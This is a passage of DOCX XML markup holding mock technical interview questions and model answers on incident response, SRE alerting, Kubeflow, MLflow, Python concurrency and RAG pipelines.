        <w:t>A: Check the CI/CD job logs first to see the exact Terraform command, workspace, variables, plan file, provider versions, and resource address where apply failed. Then check Terraform state and plan output to identify which resources changed successfully and which did not. In parallel, inspect Cloud Audit Logs for IAM, network, database, or compute changes, Kubernetes events if cluster resources were affected, and application/cloud logs for user impact. The goal is to build a timeline: what Terraform attempted, what the cloud accepted, what Kubernetes observed, and when symptoms started.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Today interview 2026-07-06 - Early incident detection: How would you design monitoring to detect customer-impacting incidents early?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from user journeys and define SLIs such as availability, latency, error rate, freshness, and successful transactions. Alert on symptoms users feel: high 5xx rate, p95/p99 latency, failed payments, queue age, failed login, stale dashboards, or error-budget burn. Add service-level dashboards, synthetic checks, black-box probes, and dependency telemetry. Cause-based alerts still help debugging, but paging should be tied to actionable user impact, clear ownership, and runbooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Today interview 2026-07-06 - Burn-rate alerts: What are burn-rate alerts and why are they useful?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Burn-rate alerts measure how quickly a service is consuming its allowed error budget for an SLO. Instead of alerting on a raw error spike, they ask whether the current error rate will exhaust the budget too quickly. Multi-window multi-burn-rate alerting catches both fast outages, such as a severe 5-minute spike, and slow burns, such as elevated errors over several hours. This reduces noise and aligns alert severity with reliability impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Today interview 2026-07-06 - Log correlation: How do you correlate logs across Kubernetes microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logging/Tracing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a correlation ID or trace ID generated at the edge and propagate it through every downstream call using headers such as traceparent or x-request-id. Each service writes structured JSON logs containing trace_id, span_id, request_id, service name, version, namespace, pod, user or tenant when safe, and error details. For async systems like Pub/Sub or Kafka, copy the trace context into message attributes. Then the logging backend can filter all logs for one request across services and connect them to distributed traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Today interview 2026-07-06 - OpenTelemetry basics: Explain OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OpenTelemetry is an open standard and toolkit for collecting metrics, logs, and traces. It helps instrument applications in a vendor-neutral way.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Opentelemetry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Q14. Today interview 2026-07-06 - Outage decision-making: During an outage with incomplete information, how do you decide whether to roll back, roll forward, use a feature flag, or shift traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Optimize for fastest safe mitigation, not proving root cause first. Roll back when the issue clearly started after a release and rollback is low risk. Roll forward when the fix is already known, tested, and safer than reverting, such as a small config patch. Use a feature flag when a specific feature path is causing impact and can be disabled without redeploying. Shift traffic when impact is region, cluster, version, or dependency specific and a healthy target exists. Communicate assumptions, set a timebox, watch customer-impact metrics, and keep a fallback if the chosen mitigation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Today interview 2026-07-06 - Similar scenario Terraform plan review: What checks would you add before Terraform apply to prevent accidental IAM or networking breakage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Similar Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require saved plan review in CI, highlighting IAM removals, firewall exposure, subnet/routing changes, deletions, and replacements. Add policy-as-code with OPA/Sentinel to block public ingress, broad admin roles, service account key creation, removal of critical IAM bindings, missing labels, or unapproved production deletes. Use least-privilege Terraform service accounts, separate states, manual approvals for prod, drift detection, and tests for modules. For high-risk resources, add change windows and break-glass rollback steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Today interview 2026-07-06 - Similar scenario progressive mitigation: A bad release affects only 10 percent of users. How would you decide between rollback, canary pause, feature disablement, and traffic shifting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Similar Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First freeze rollout and stop increasing exposure. If the issue maps to a feature flag, disable the feature because that is usually fastest and least disruptive. If the canary version is bad, roll it back or shift traffic back to the stable version. If only one region/cluster is affected, shift traffic to healthy capacity if available. Roll forward only if the fix is small, already tested, and faster than rollback. Validate recovery on user-impact metrics, not only pod health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 49 - Kubeflow MLflow Multiprocessing RAG Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Kubeflow platform design: How would you design a production Kubeflow platform on GKE for notebooks, pipelines, training, serving, security, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run Kubeflow on a dedicated GKE platform with separate namespaces/profiles per team, GPU and CPU node pools, Workload Identity, Artifact Registry, Cloud Storage, and centralized logging/monitoring. Provide managed notebook access, Kubeflow Pipelines for repeatable workflows, training operators for distributed jobs, KServe for model serving, and platform guardrails such as RBAC, quotas, network policies, image scanning, backups, and clear ownership for each component.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Kubeflow Pipelines: How would you design a reusable Kubeflow Pipeline for data validation, training, evaluation, registration, and conditional deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model the workflow as containerized components connected by typed inputs/outputs: validate data, transform features, train, evaluate, and only register or deploy if metrics pass thresholds. Store artifacts in object storage, record metadata for lineage, parameterize environment-specific values, enable caching only when cache keys include data/code/config versions, and keep deployment as a conditional step so bad models stop before production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Kubeflow multi-user isolation: How would you isolate teams in Kubeflow using namespaces, profiles, RBAC, service accounts, quotas, and network policies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Give each team a Kubeflow profile mapped to its own namespace, service accounts, resource quotas, and role bindings. Restrict cross-namespace access with RBAC and network policies, use Workload Identity for least-privilege GCP access, apply separate CPU/GPU quotas to prevent noisy neighbors, and tag/label workloads so usage, cost, and ownership are visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubeflow troubleshooting: A Kubeflow pipeline step is stuck Pending or failing. How would you debug pods, volumes, service accounts, images, logs, and events?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with the pipeline UI to identify the failed component, then inspect the underlying pod with kubectl: events, scheduling reason, image pull errors, volume mounts, service account permissions, resource requests, node selectors, and logs. Pending often means quota, node capacity, taints/tolerations, PVC, or GPU availability; runtime failure usually points to container command, dependency, data path, or permission issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. MLflow tracking design: How would you structure MLflow experiments, runs, parameters, metrics, tags, artifacts, and naming conventions for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create experiments around stable business problems or model families, not every individual run, and use consistent run names that include project, branch or pipeline run, and purpose. Log hyperparameters as params, evaluation results as metrics, model files and reports as artifacts, and use tags for owner, git commit, dataset version, environment, feature set, and candidate/prod status so runs are searchable and comparable across the team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. MLflow model registry: How would you use MLflow Model Registry for versioning, approvals, stage transitions, aliases, rollback, and auditability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Register only evaluated candidate models, attach metadata linking the model version to the MLflow run, git commit, dataset, metrics, and owner, and require an approval step before promotion. Use stages or aliases to identify candidate, staging, and production versions, keep older production versions available for rollback, and record comments or approvals in the registry so model promotion is auditable rather than a silent artifact overwrite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. MLflow on Kubernetes: How would you deploy and operate an MLflow tracking server on GKE, including database, object storage, ingress, auth, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy MLflow as a stateless Kubernetes Deployment, use Cloud SQL/Postgres for the backend store, GCS for artifacts, Workload Identity for bucket/database access where possible, and an ingress or internal load balancer protected by SSO/IAP or an auth proxy. Add resource requests/limits, health checks, TLS, backups, audit logging, dashboards for request errors and latency, and alerts for database or artifact-store failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. MLflow troubleshooting: An MLflow run logged metrics but the model artifact is missing or cannot be loaded. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the run completed the artifact logging step, inspect the artifact URI, verify the tracking server and client are using the same artifact store configuration, and confirm the service account or user has write/read permissions to the bucket or filesystem. Then verify dependency/environment files, model flavor, serialization format, and MLflow version compatibility, because a model can exist in storage but still fail to load if the environment or flavor metadata is wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Mock 49 focus - Python concurrency and multiprocessing choices for cloud and ML workloads: When would you use threads, asyncio, multiprocessing, or a bounded worker pool?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use threads or asyncio for I/O-bound work such as cloud API inventory, object-store reads, HTTP calls, and database queries. Use a bounded worker pool when you need concurrency but must control API quota, memory, or downstream load. Use multiprocessing for CPU-bound work such as feature computation, PDF/image parsing, model preprocessing, compression, encryption, or large local transformations, because separate processes can use multiple CPU cores and avoid the GIL. In production, the decision should come after profiling, and every concurrent design needs timeouts, retries, error collection, and rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Mock 49 focus - Python multiprocessing deep dive: Explain multiprocessing in Python and when it is better than multithreading for CPU-heavy ML or data-processing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multiprocessing creates separate OS processes, so each worker has its own Python interpreter and memory space. That lets CPU-heavy Python code run across multiple cores without being limited by the GIL. It is better than multithreading for CPU-bound work such as feature engineering, image/PDF parsing, CPU-heavy preprocessing, encryption, compression, and batch scoring transformations. Threads are usually better for I/O-bound work because they are lighter and can overlap waiting on network or disk. The tradeoffs of multiprocessing are process startup cost, memory overhead, serialization/pickling of data, and more careful handling of shared state through queues, pools, shared memory, or external storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Mock 49 focus - RAG reliability debugging: A retrieval-augmented generation pipeline returns stale or irrelevant context. How would you debug indexing, embeddings, chunking, retrieval, and reranking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First classify the failure: stale context means the source-to-index pipeline is behind; irrelevant context means retrieval quality is poor. For stale results, check source update time, ingestion jobs, failed upserts/deletes, index aliases, and whether the right collection is queried. For irrelevant results, inspect chunk size, overlap, metadata filters, embedding model/version mismatch, query rewriting, top-k, similarity threshold, and reranker behavior. Validate with a golden retrieval set where each question has expected source documents. Log retrieved IDs, scores, chunk metadata, and prompt template version so every bad answer can be traced to retrieval or generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Vector database operations: How would you operate a production vector database, including indexing strategy, reindexing without downtime, backup/restore, and scaling for query latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose an index type (HNSW for low-latency approximate search, IVF for larger scale with a recall/speed tradeoff) sized for expected vector count and query rate, and reindex without downtime by building the new index alongside the old one (blue-green) and cutting over traffic once the new index passes recall/latency validation. Back up the underlying vector store and metadata together so a restore reconstructs a consistent state, and scale query latency with read replicas, sharding by tenant/namespace, and caching frequent queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. RAG vs fine-tuning vs prompting: How would you decide between prompt engineering, RAG, and fine-tuning for a domain-specific GenAI use case, and how would that decision change operational ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with prompt engineering for anything that can be solved with better instructions and few-shot examples, since it has the lowest operational cost and fastest iteration. Add RAG when the model needs access to specific, frequently-changing, or proprietary knowledge it wasn't trained on. Reserve fine-tuning for cases needing a consistent style/format at scale or behavior that prompting genuinely cannot achieve, since fine-tuning adds real operational ownership - training pipelines, versioned model artifacts, evaluation before each retrain, and a rollback story that prompting and RAG don't require.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Resume deep-dive - RAG pipeline: Walk me through the RAG pipeline you built, including embedding model choice, vector database, chunking, and how you measured answer quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The pipeline chunks source documents with an overlap strategy (typically 200-500 tokens per chunk with some overlap to preserve context across boundaries), embeds chunks with a domain-appropriate embedding model, and stores vectors with metadata for filtering. At query time it embeds the user question, retrieves the top-k most similar chunks, and passes them as grounding context to the LLM. Answer quality was measured with a mix of retrieval metrics (recall@k against a labeled set) and generation metrics (groundedness/faithfulness checks, either via an LLM-as-judge or human review) rather than relying on generation quality alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Kubeflow vs MLflow vs Vertex AI: How would you choose between Kubeflow, MLflow, and Vertex AI for a GCP MLOps platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Kubeflow when you want Kubernetes-native control over pipelines, training, serving, and multi-user ML workflows, especially on GKE. Use MLflow when experiment tracking, model packaging, and registry portability are the primary needs. Use Vertex AI when managed GCP operations, IAM/audit integration, managed endpoints, and lower platform maintenance matter most; many real platforms combine them, for example Kubeflow for pipelines, MLflow for tracking, and Vertex AI for managed serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Mock 49 focus - RAG and LLM observability: What would you trace and log end to end for a RAG request without leaking prompts, PII, secrets, or retrieved sensitive text?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trace the full request path: gateway, auth, query rewrite, vector search, reranking, prompt assembly, model inference, tool calls, and response post-processing. Log safe metadata such as trace ID, tenant, prompt template version, model version, retrieved document IDs, chunk IDs, similarity scores, token counts, latency by stage, cache hit/miss, finish reason, and safety flags. Do not log raw prompts, secrets, PII, or full retrieved content into standard logs. If deep debugging payloads are required, store redacted or access-controlled samples with short retention and clear audit trails. This gives enough signal for latency, cost, hallucination, and retrieval debugging without creating a data-leak risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 50 - LLM and Machine Learning Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Mock 50 focus - LLM production architecture: How would you design a production LLM-backed service with model routing, caching, rate limits, observability, safety, and cost controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
